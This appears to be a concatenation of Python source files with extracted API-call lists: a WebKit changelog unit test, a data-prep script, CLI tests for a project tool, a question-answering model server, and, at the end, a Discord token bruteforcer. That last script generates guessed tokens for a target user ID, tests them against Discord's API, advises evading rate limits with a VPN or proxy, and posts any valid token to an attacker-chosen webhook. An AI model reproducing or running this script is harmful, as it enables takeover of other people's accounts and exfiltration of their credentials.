# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import unittest
from webkitpy.common.checkout.changelog_unittest import ChangeLogTest
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.tool.mocktool import MockOptions, MockTool
from webkitpy.tool.steps.preparechangelog import PrepareChangeLog
class PrepareChangeLogTest(ChangeLogTest):
def test_ensure_bug_url(self):
capture = OutputCapture()
step = PrepareChangeLog(MockTool(), MockOptions())
changelog_contents = u"%s\n%s" % (self._new_entry_boilerplate, self._example_changelog)
changelog_path = self._write_tmp_file_with_contents(changelog_contents.encode("utf-8"))
state = {
"bug_title": "Example title",
"bug_id": 1234,
"changelogs": [changelog_path],
}
capture.assert_outputs(self, step.run, [state])
actual_contents = self._read_file_contents(changelog_path, "utf-8")
expected_message = "Example title\n http://example.com/1234"
expected_contents = changelog_contents.replace("Need a short description and bug URL (OOPS!)", expected_message)
os.remove(changelog_path)
self.assertEquals(actual_contents.splitlines(), expected_contents.splitlines())
|
[
"webkitpy.tool.mocktool.MockTool",
"os.remove",
"webkitpy.tool.mocktool.MockOptions",
"webkitpy.common.system.outputcapture.OutputCapture"
] |
[((1908, 1923), 'webkitpy.common.system.outputcapture.OutputCapture', 'OutputCapture', ([], {}), '()\n', (1921, 1923), False, 'from webkitpy.common.system.outputcapture import OutputCapture\n'), ((2654, 2679), 'os.remove', 'os.remove', (['changelog_path'], {}), '(changelog_path)\n', (2663, 2679), False, 'import os\n'), ((1956, 1966), 'webkitpy.tool.mocktool.MockTool', 'MockTool', ([], {}), '()\n', (1964, 1966), False, 'from webkitpy.tool.mocktool import MockOptions, MockTool\n'), ((1968, 1981), 'webkitpy.tool.mocktool.MockOptions', 'MockOptions', ([], {}), '()\n', (1979, 1981), False, 'from webkitpy.tool.mocktool import MockOptions, MockTool\n')]
|
import argparse
import os
print("In dataprep.py: as a data scientist, this is where you should fill in your dataprep code.")
parser = argparse.ArgumentParser("dataprep")
parser.add_argument("--input_data", type=str, help="input data")
parser.add_argument("--processed_data", type=str, help="processed_data directory")
args = parser.parse_args()
print(f"Argument 1: {args.input_data}")
print(f"Argument 2: {args.processed_data}")
if args.processed_data is not None:
os.makedirs(args.processed_data, exist_ok=True)
print(f"{args.processed_data} created")
|
[
"os.makedirs",
"argparse.ArgumentParser"
] |
[((136, 171), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""dataprep"""'], {}), "('dataprep')\n", (159, 171), False, 'import argparse\n'), ((474, 521), 'os.makedirs', 'os.makedirs', (['args.processed_data'], {'exist_ok': '(True)'}), '(args.processed_data, exist_ok=True)\n', (485, 521), False, 'import os\n')]
|
import unittest
import datetime
import click
from click.testing import CliRunner
# init database
from gather2gether.db import g2gDB
from gather2gether.db import *
init_database(g2gDB)
from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete
from gather2gether.db.task import task_delete, task_search
from gather2gether.db.user import user_create, user_search, user_delete
from gather2gether.cli_project import cli_project_create, cli_project_find, cli_project_search, cli_project_update, cli_project_delete
import logging
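# logging.disable(logging.NOTSET) clears any prior disable threshold, so
# every log level is emitted while these tests run.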
logging.disable(logging.NOTSET)
class TestCliProject(unittest.TestCase):
def setUp(self):
# delete all tasks in database
found_tasks = task_search()
for task in found_tasks:
task_delete(task.project.project_name, task.task_number)
# delete all projects in database
found_projects = project_search()
for project in found_projects:
project_delete(project.project_name)
# delete all users in database
found_users = user_search()
for user in found_users:
user_delete(user.external_id)
def test_cli_project_create(self):
project_identifier = "test_cli_project_create"
runner = CliRunner()
result = runner.invoke(cli_project_create, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Project created successfully", result.output)
project_found = project_find(project_identifier)
self.assertIsNotNone(project_found)
self.assertEqual(project_found.project_name, project_identifier)
def test_cli_project_create_full(self):
project_identifier = "test_cli_project_create"
expected_description = "description of test_cli_project_create"
expected_start_date = "2020-01-01"
expected_end_date = "2020-01-10"
runner = CliRunner()
result = runner.invoke(cli_project_create, [
project_identifier,
"--description", expected_description,
"--planned_start_date", expected_start_date,
"--planned_end_date", expected_end_date
])
self.assertIsNone(result.exception)
self.assertIn("Project created successfully", result.output)
project_found = project_find(project_identifier)
self.assertIsNotNone(project_found)
self.assertEqual(project_found.project_name, project_identifier)
self.assertEqual(project_found.description, expected_description)
self.assertEqual(project_found.planned_start_date, datetime.datetime.strptime(expected_start_date, "%Y-%m-%d"))
self.assertEqual(project_found.planned_end_date, datetime.datetime.strptime(expected_end_date, "%Y-%m-%d"))
def test_cli_project_create_already_exists(self):
project_identifier = "test_cli_project_create_already_exists"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_create, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Failed to create project", result.output)
def test_cli_project_find_by_name_not_exists(self):
project_identifier = "test_cli_project_find_by_name_not_exists"
runner = CliRunner()
result = runner.invoke(cli_project_find, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Not found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_find_by_id_not_exists(self):
project_identifier = "-50"
runner = CliRunner()
result = runner.invoke(cli_project_find, ["--identifier_type", "id", "--", project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Not found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_find_by_name_exists(self):
project_identifier = "test_cli_project_find_by_name_exists"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_find, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_find_by_id_exists(self):
project = project_create("test_cli_project_find_by_id_exists")
project_identifier = str(project.id)
runner = CliRunner()
result = runner.invoke(cli_project_find, [project_identifier, "--identifier_type", "id"])
self.assertIsNone(result.exception)
self.assertIn("Found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_search_closed(self):
project_identifier = "test_cli_project_search_closed"
project_create(project_identifier)
project_update(project_identifier, closed_date="2020-01-01")
runner = CliRunner()
result = runner.invoke(cli_project_search, ["--is_closed", "true"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertIn(project_identifier, result.output)
result = runner.invoke(cli_project_search, ["--is_closed", "false"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertNotIn(project_identifier, result.output)
def test_cli_project_search_not_closed(self):
project_identifier = "test_cli_project_search_not_closed"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_search, ["--is_closed", "true"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertNotIn(project_identifier, result.output)
result = runner.invoke(cli_project_search, ["--is_closed", "false"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertIn(project_identifier, result.output)
def test_cli_project_update_by_name_exists(self):
project_identifier = "test_cli_project_update_by_name_exists"
expected_new_name = "test_cli_project_update_by_name_exists updated"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_update, [project_identifier, "--project_name", expected_new_name])
self.assertIsNone(result.exception)
self.assertIn("Successfuly updated project name: {0}".format(project_identifier), result.output)
project_found = project_find(project_identifier)
self.assertIsNone(project_found)
project_found = project_find(expected_new_name)
self.assertIsNotNone(project_found)
def test_cli_project_update_by_id_exists(self):
expected_new_name = "test_cli_project_update_by_id_exists updated"
project = project_create("test_cli_project_update_by_id_exists")
project_identifier = str(project.id)
runner = CliRunner()
result = runner.invoke(cli_project_update, [project_identifier, "--identifier_type", "id", "--project_name", expected_new_name])
self.assertIsNone(result.exception)
self.assertIn("Successfuly updated project name: {0}".format(project_identifier), result.output)
project_found = project_find(project.id)
self.assertIsNotNone(project_found)
self.assertEqual(project_found.project_name, expected_new_name)
def test_cli_project_update_by_name_not_exists(self):
project_identifier = "test_cli_project_update_by_name_exists"
runner = CliRunner()
result = runner.invoke(cli_project_update, [project_identifier, "--project_name", "new project name"])
self.assertIsNone(result.exception)
self.assertIn("Not found project to update, name:{0}".format(project_identifier), result.output)
def test_cli_project_update_by_id_not_exists(self):
project_identifier = "-50"
runner = CliRunner()
result = runner.invoke(cli_project_update, ["--identifier_type", "id", "--project_name", "new project name", "--", project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Not found project to update, name:{0}".format(project_identifier), result.output)
def test_cli_project_delete_by_name(self):
project_identifier = "test_cli_project_delete_by_name"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_delete, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Successfuly deleted project name: {0}".format(project_identifier), result.output)
project_found = project_find(project_identifier)
self.assertIsNone(project_found)
def test_cli_project_delete_by_id(self):
project = project_create("test_cli_project_delete_by_id")
project_identifier = str(project.id)
runner = CliRunner()
result = runner.invoke(cli_project_delete, [project_identifier, "--identifier_type", "id"])
self.assertIsNone(result.exception)
self.assertIn("Successfuly deleted project name: {0}".format(project_identifier), result.output)
project_found = project_find(project.id)
self.assertIsNone(project_found)
|
[
"gather2gether.db.project.project_update",
"gather2gether.db.project.project_find",
"gather2gether.db.task.task_search",
"gather2gether.db.project.project_create",
"gather2gether.db.project.project_delete",
"gather2gether.db.project.project_search",
"logging.disable",
"gather2gether.db.user.user_delete",
"click.testing.CliRunner",
"gather2gether.db.user.user_search",
"gather2gether.db.task.task_delete"
] |
[((567, 598), 'logging.disable', 'logging.disable', (['logging.NOTSET'], {}), '(logging.NOTSET)\n', (582, 598), False, 'import logging\n'), ((724, 737), 'gather2gether.db.task.task_search', 'task_search', ([], {}), '()\n', (735, 737), False, 'from gather2gether.db.task import task_delete, task_search\n'), ((907, 923), 'gather2gether.db.project.project_search', 'project_search', ([], {}), '()\n', (921, 923), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((1073, 1086), 'gather2gether.db.user.user_search', 'user_search', ([], {}), '()\n', (1084, 1086), False, 'from gather2gether.db.user import user_create, user_search, user_delete\n'), ((1274, 1285), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1283, 1285), False, 'from click.testing import CliRunner\n'), ((1496, 1528), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (1508, 1528), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((1919, 1930), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1928, 1930), False, 'from click.testing import CliRunner\n'), ((2328, 2360), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (2340, 2360), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((2921, 2955), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (2935, 2955), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((2973, 2984), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2982, 2984), False, 'from click.testing import CliRunner\n'), ((3313, 3324), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3322, 3324), False, 'from click.testing import CliRunner\n'), ((3652, 3663), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3661, 3663), False, 'from click.testing import CliRunner\n'), ((4046, 4080), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (4060, 4080), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((4098, 4109), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4107, 4109), False, 'from click.testing import CliRunner\n'), ((4395, 4447), 'gather2gether.db.project.project_create', 'project_create', (['"""test_cli_project_find_by_id_exists"""'], {}), "('test_cli_project_find_by_id_exists')\n", (4409, 4447), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((4510, 4521), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4519, 4521), False, 'from click.testing import CliRunner\n'), ((4882, 4916), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (4896, 4916), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((4925, 4985), 'gather2gether.db.project.project_update', 'project_update', (['project_identifier'], {'closed_date': '"""2020-01-01"""'}), "(project_identifier, closed_date='2020-01-01')\n", (4939, 4985), 
False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((5003, 5014), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5012, 5014), False, 'from click.testing import CliRunner\n'), ((5628, 5662), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (5642, 5662), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((5680, 5691), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5689, 5691), False, 'from click.testing import CliRunner\n'), ((6390, 6424), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (6404, 6424), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((6442, 6453), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6451, 6453), False, 'from click.testing import CliRunner\n'), ((6737, 6769), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (6749, 6769), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((6835, 6866), 'gather2gether.db.project.project_find', 'project_find', (['expected_new_name'], {}), '(expected_new_name)\n', (6847, 6866), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((7057, 7111), 'gather2gether.db.project.project_create', 'project_create', (['"""test_cli_project_update_by_id_exists"""'], {}), "('test_cli_project_update_by_id_exists')\n", (7071, 7111), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((7174, 7185), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7183, 7185), False, 'from click.testing import CliRunner\n'), ((7496, 7520), 'gather2gether.db.project.project_find', 'project_find', (['project.id'], {}), '(project.id)\n', (7508, 7520), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((7783, 7794), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7792, 7794), False, 'from click.testing import CliRunner\n'), ((8164, 8175), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8173, 8175), False, 'from click.testing import CliRunner\n'), ((8588, 8622), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (8602, 8622), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((8640, 8651), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8649, 8651), False, 'from click.testing import CliRunner\n'), ((8898, 8930), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (8910, 8930), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((9036, 9083), 'gather2gether.db.project.project_create', 'project_create', (['"""test_cli_project_delete_by_id"""'], {}), "('test_cli_project_delete_by_id')\n", (9050, 9083), False, 'from gather2gether.db.project import project_create, project_find, project_update, 
project_search, project_delete\n'), ((9146, 9157), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (9155, 9157), False, 'from click.testing import CliRunner\n'), ((9431, 9455), 'gather2gether.db.project.project_find', 'project_find', (['project.id'], {}), '(project.id)\n', (9443, 9455), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((783, 839), 'gather2gether.db.task.task_delete', 'task_delete', (['task.project.project_name', 'task.task_number'], {}), '(task.project.project_name, task.task_number)\n', (794, 839), False, 'from gather2gether.db.task import task_delete, task_search\n'), ((975, 1011), 'gather2gether.db.project.project_delete', 'project_delete', (['project.project_name'], {}), '(project.project_name)\n', (989, 1011), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((1132, 1161), 'gather2gether.db.user.user_delete', 'user_delete', (['user.external_id'], {}), '(user.external_id)\n', (1143, 1161), False, 'from gather2gether.db.user import user_create, user_search, user_delete\n')]
|
import json
import logging
import os
from pathlib import Path
import collections
import ast
import yaml
from fire import Fire
import time
import torch
from torch.nn import functional as F
from transformers import AutoTokenizer, AutoModelForQuestionAnswering
from health_qa.src.utils import chunks_ques_wrapper
# change the directory to the project root
logger = logging.getLogger(__name__)
project_path = str(Path(__file__).parent.parent.parent)
os.chdir(project_path)
config = 'server/config/handler_config.yaml'
with open(config, 'r') as stream:
config = yaml.load(stream, Loader=yaml.FullLoader)
initialized = False
initialized_result = None
def initialize(context):
global initialized
global initialized_result
if initialized:
return
initialized = True
    # get cuda device
properties = context.system_properties
device = torch.device("cuda:" + str(properties.get("gpu_id"))
if torch.cuda.is_available() else "cpu")
# Load a trained model and vocabulary that you have fine-tuned
model = AutoModelForQuestionAnswering.from_pretrained(config['MODEL_DIR']) # , force_download=True)
tokenizer = AutoTokenizer.from_pretrained(config['MODEL_DIR'], do_lower_case=True)
model.to(device)
model.eval()
initialized_result = model, tokenizer, device
def process_request(requests, context):
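    # Payloads may arrive under "data" or, as raw UTF-8 bytes, under "body"
    # (serving frontends differ); both layouts are handled below.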
_contexts = []
_questions = []
for request in requests:
_context = []
text_json = request.get("data")
if text_json is None:
# convert bytearray to utf-8
text_json = request.get("body").decode('utf-8')
basic_info = ast.literal_eval(text_json)
text = basic_info.get('context')
questions = basic_info.get('questions')
if not questions:
            questions_list = {}  # keep a dict here; downstream code calls .keys() on it
else:
questions_list = {q['content']:q['ID'] for q in questions}
_context.append(text)
_contexts.append(_context)
_questions.append(questions_list)
return _contexts, _questions
# @chunks_ques_wrapper(all_ques, size=12)
def inference(model, tokenizer, device, text, questions=None):
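    # Pair every question with the same passage: the one-element context list
    # is tiled to match the number of questions, then tokenized as one batch.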
inputs = tokenizer(questions, text*len(questions), add_special_tokens=True, return_tensors="pt", padding=True)
input_ids = inputs["input_ids"].tolist()
inputs.to(device)
with torch.no_grad():
answer_scores = model(**inputs)
# To get the score by softmax
answer_start_scores, answer_end_scores = F.softmax(torch.stack(answer_scores), dim=-1)
# Get the most likely beginning of answer with the argmax of the score
answer_s_max_scores, answer_starts = torch.max(answer_start_scores, -1)
# Get the most likely end of answer with the argmax of the score
answer_e_max_scores, answer_ends = torch.max(answer_end_scores, -1)
answer_ends = answer_ends + 1
confidences = (answer_s_max_scores + answer_e_max_scores) / 2
# release the memory to avoid the OOM
torch.cuda.empty_cache()
return input_ids, answer_starts, answer_ends, confidences
def postprocessing(tokenizer, input_ids, answer_starts, answer_ends, confidences, all_ques):
answers = []
for input_id, answer_start, answer_end in zip(input_ids, answer_starts, answer_ends):
answer = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(input_id[answer_start:answer_end]))
answer = answer.replace(' ', '')
        # the question has no answer in the passage
        if '[CLS]' in answer or '[SEP]' in answer or answer == '':
            answer = '無答案'  # i.e. "no answer"
answers.append(answer)
response = collections.defaultdict(dict)
for question, answer, confidence in zip(all_ques, answers, confidences):
qid = all_ques[question]
response[qid].update({'Question': question})
response[qid].update({'Answer': answer})
response[qid].update({'Confidence': f'{confidence:.2f}'})
response = dict(sorted(response.items(), key=lambda pair: pair[0]))
basic_info = {}
t = time.localtime()
timestamp = time.strftime('%Y%m%d%H%M%S', t)
basic_info['timestamp'] = str(timestamp)
basic_info['Questions'] = response
return basic_info
def handler(data, context):
if data is None:
initialize(context)
return None
assert initialized_result is not None
model, tokenizer, device = initialized_result
responses = []
contexts, _questions = process_request(data, context)
for context, questions_dict in zip(contexts, _questions):
questions = list(questions_dict.keys())
input_ids, answer_starts, answer_ends, confidences = chunks_ques_wrapper(all_ques=questions, size=13)(inference)(model, tokenizer, device, text=context)
response = postprocessing(tokenizer, input_ids, answer_starts, answer_ends, confidences, questions_dict)
responses.append(response)
return responses
def main_test_handler(loop_count=1, batch_size=3):
from easydict import EasyDict
from tqdm import tqdm
import json
test_json_path = 'server/test_json/sample_text1.txt'
json_context = json.load(open(test_json_path))
data = [{
'body': json.dumps(json_context).encode('utf8')
}] * batch_size
context = {
'system_properties': {
'gpu_id': '0'
}
}
context = EasyDict(context)
responses = handler(None, context)
responses = handler(data, context)
timer = tqdm(total=batch_size*loop_count,
smoothing=0.0, dynamic_ncols=True)
for _ in range(loop_count):
handler(data, context)
timer.update(batch_size)
if __name__ == '__main__':
Fire(main_test_handler)
|
[
"yaml.load",
"time.strftime",
"logging.getLogger",
"json.dumps",
"collections.defaultdict",
"pathlib.Path",
"torch.no_grad",
"os.chdir",
"transformers.AutoModelForQuestionAnswering.from_pretrained",
"easydict.EasyDict",
"time.localtime",
"tqdm.tqdm",
"transformers.AutoTokenizer.from_pretrained",
"torch.max",
"torch.cuda.is_available",
"fire.Fire",
"torch.stack",
"torch.cuda.empty_cache",
"ast.literal_eval",
"health_qa.src.utils.chunks_ques_wrapper"
] |
[((364, 391), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (381, 391), False, 'import logging\n'), ((448, 470), 'os.chdir', 'os.chdir', (['project_path'], {}), '(project_path)\n', (456, 470), False, 'import os\n'), ((564, 605), 'yaml.load', 'yaml.load', (['stream'], {'Loader': 'yaml.FullLoader'}), '(stream, Loader=yaml.FullLoader)\n', (573, 605), False, 'import yaml\n'), ((1071, 1137), 'transformers.AutoModelForQuestionAnswering.from_pretrained', 'AutoModelForQuestionAnswering.from_pretrained', (["config['MODEL_DIR']"], {}), "(config['MODEL_DIR'])\n", (1116, 1137), False, 'from transformers import AutoTokenizer, AutoModelForQuestionAnswering\n'), ((1180, 1250), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (["config['MODEL_DIR']"], {'do_lower_case': '(True)'}), "(config['MODEL_DIR'], do_lower_case=True)\n", (1209, 1250), False, 'from transformers import AutoTokenizer, AutoModelForQuestionAnswering\n'), ((2688, 2722), 'torch.max', 'torch.max', (['answer_start_scores', '(-1)'], {}), '(answer_start_scores, -1)\n', (2697, 2722), False, 'import torch\n'), ((2833, 2865), 'torch.max', 'torch.max', (['answer_end_scores', '(-1)'], {}), '(answer_end_scores, -1)\n', (2842, 2865), False, 'import torch\n'), ((3018, 3042), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (3040, 3042), False, 'import torch\n'), ((3667, 3696), 'collections.defaultdict', 'collections.defaultdict', (['dict'], {}), '(dict)\n', (3690, 3696), False, 'import collections\n'), ((4076, 4092), 'time.localtime', 'time.localtime', ([], {}), '()\n', (4090, 4092), False, 'import time\n'), ((4109, 4141), 'time.strftime', 'time.strftime', (['"""%Y%m%d%H%M%S"""', 't'], {}), "('%Y%m%d%H%M%S', t)\n", (4122, 4141), False, 'import time\n'), ((5406, 5423), 'easydict.EasyDict', 'EasyDict', (['context'], {}), '(context)\n', (5414, 5423), False, 'from easydict import EasyDict\n'), ((5515, 5585), 'tqdm.tqdm', 'tqdm', ([], {'total': '(batch_size * loop_count)', 'smoothing': '(0.0)', 'dynamic_ncols': '(True)'}), '(total=batch_size * loop_count, smoothing=0.0, dynamic_ncols=True)\n', (5519, 5585), False, 'from tqdm import tqdm\n'), ((5729, 5752), 'fire.Fire', 'Fire', (['main_test_handler'], {}), '(main_test_handler)\n', (5733, 5752), False, 'from fire import Fire\n'), ((2389, 2404), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2402, 2404), False, 'import torch\n'), ((2536, 2562), 'torch.stack', 'torch.stack', (['answer_scores'], {}), '(answer_scores)\n', (2547, 2562), False, 'import torch\n'), ((953, 978), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (976, 978), False, 'import torch\n'), ((1681, 1708), 'ast.literal_eval', 'ast.literal_eval', (['text_json'], {}), '(text_json)\n', (1697, 1708), False, 'import ast\n'), ((411, 425), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (415, 425), False, 'from pathlib import Path\n'), ((4690, 4738), 'health_qa.src.utils.chunks_ques_wrapper', 'chunks_ques_wrapper', ([], {'all_ques': 'questions', 'size': '(13)'}), '(all_ques=questions, size=13)\n', (4709, 4738), False, 'from health_qa.src.utils import chunks_ques_wrapper\n'), ((5233, 5257), 'json.dumps', 'json.dumps', (['json_context'], {}), '(json_context)\n', (5243, 5257), False, 'import json\n')]
|
import requests
import colorama
import os
from base64 import b64encode as b64
from base64 import b64decode
import base64
from random import choice as ch
import time
from colorama import Fore, Back, Style
from colorama import init
def bruteforce_token():
init()
print(Style.BRIGHT)
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
print("NOTE: this bruteforcer does NOT work with MFA tokens, those seem to have a different structure than normal ones.\n\n")
WEBHOOK_URL = input('WebHook URL to send bruteforce results to, if successful: ')
URL = 'https://discordapp.com/api/users/@me'
valid_or_not = None
userid = input('UserID to bruteforce: ')
times = input('Amount of times to bruteforce (int): ')
once = 0
start = str(b64(userid.encode("utf-8"))).replace("'","")[1:]
CHARS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'M', 'N', 'O', 'p', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '_']
CHARS2 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'M', 'N', 'O', 'p', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
try:
f_read = open('ignore.txt', 'r')
tokens_to_ignore = str(f_read.read())
f_read.close
except:
tokens_to_ignore = "lorem ipsum no_match"
while once < int(times):
mid = str(ch(CHARS2) + ch(CHARS2) + ch(CHARS2) + ch(CHARS2) + ch(CHARS2) + ch(CHARS2))
end = str(ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS) + ch(CHARS))
token = f"{start}.{mid}.{end}"
if token in tokens_to_ignore:
break
else:
headers = {"Authorization":f"{token}"} # TODO: finish this header thingee
x = requests.get(URL, headers=headers)
if int(x.status_code) == 401:
try:
f = open('ignore.txt', 'a')
f.write(f"\n{token}")
f.close
except:
f = open('ignore.txt', 'w')
f.write(token)
f.close
valid_or_not = "INVALID"
print(f"{Fore.RED}{once+1}) {token} {valid_or_not}")
time.sleep(0.1)
elif int(x.status_code) == 200:
valid_or_not = "VALID"
print(f"{Fore.GREEN}{once+1}) {token} {valid_or_not}")
f = open('valid_token.txt', 'w')
f.write(f'FOUND TOKEN "{token}" FOR USERID "{userid}"')
f.close()
hook_data = {
"content" : f"_ _",
"username" : "Bruteforce Alerts"
}
hook_data["embeds"] = [{"description" : f"The UserID \"{userid}\" has been successfully bruteforced!```TOKEN: \"{token}\"\n\nAMOUNT OF COMBOS TRIED: {once+1}```", "title" : "BRUTEFORCE SUCCESS!" }]
requests.post(WEBHOOK_URL, json = hook_data)
exit()
break
else:
print(f"{Fore.YELLOW}You are being rate limited. The program will now freeze for a minute. If this issue persists, enable a VPN or prefix a proxy url to the \"URL\" variable (variable found on line 27).")
time.sleep(60)
once=once+1
if once >= int(times):
if valid_or_not == "VALID":
valid_count = "1"
else:
valid_count = "0"
print(f"{Fore.CYAN}Out of {once} combinations tested, {valid_count} of them are valid.")
return
|
[
"colorama.init",
"random.choice",
"os.system",
"time.sleep",
"requests.get",
"requests.post"
] |
